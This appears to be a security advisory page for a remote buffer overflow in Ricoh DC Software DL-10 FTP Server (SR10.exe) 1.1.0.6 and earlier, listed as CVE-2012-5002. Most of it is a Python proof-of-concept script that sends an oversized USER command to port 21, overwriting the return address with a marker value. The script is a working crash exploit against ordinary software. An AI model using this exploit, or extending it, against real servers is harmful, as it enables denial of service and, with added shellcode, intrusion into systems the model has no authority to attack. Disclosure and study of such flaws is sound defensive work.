|
|
| |
| Ricoh DC Software DL-10 FTP Server (SR10.exe) suffers from remote buffer overflow vulnerability. |
| |
Credit:
The information has been provided by Julien Ahrens.
|
| |
Vulnerable Systems:
* Ricoh DC Software DL-10 FTP Server (SR10.exe) version 1.1.0.6 and prior
import socket,sys
import os
target="192.168.0.1"
port=21
junk1 = "\x41" * 245
boom = "\x42\x42\x42\x42"
junk2 = "\x43" * 50
payload = junk1 + boom + junk2
print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[*] Connected to " + target + "!"
except:
print "[!] " + target + " didn't respond\n"
sys.exit(0)
s.recv(1024)
print "[*] Sending malformed request..."
s.send('USER ' + payload + '\r\n')
print "[!] Exploit has been sent!\n"
s.close()
CVE Information:
2012-5002
Disclosure Timeline:
Published: 2012-03-22
|
|
blog comments powered by
|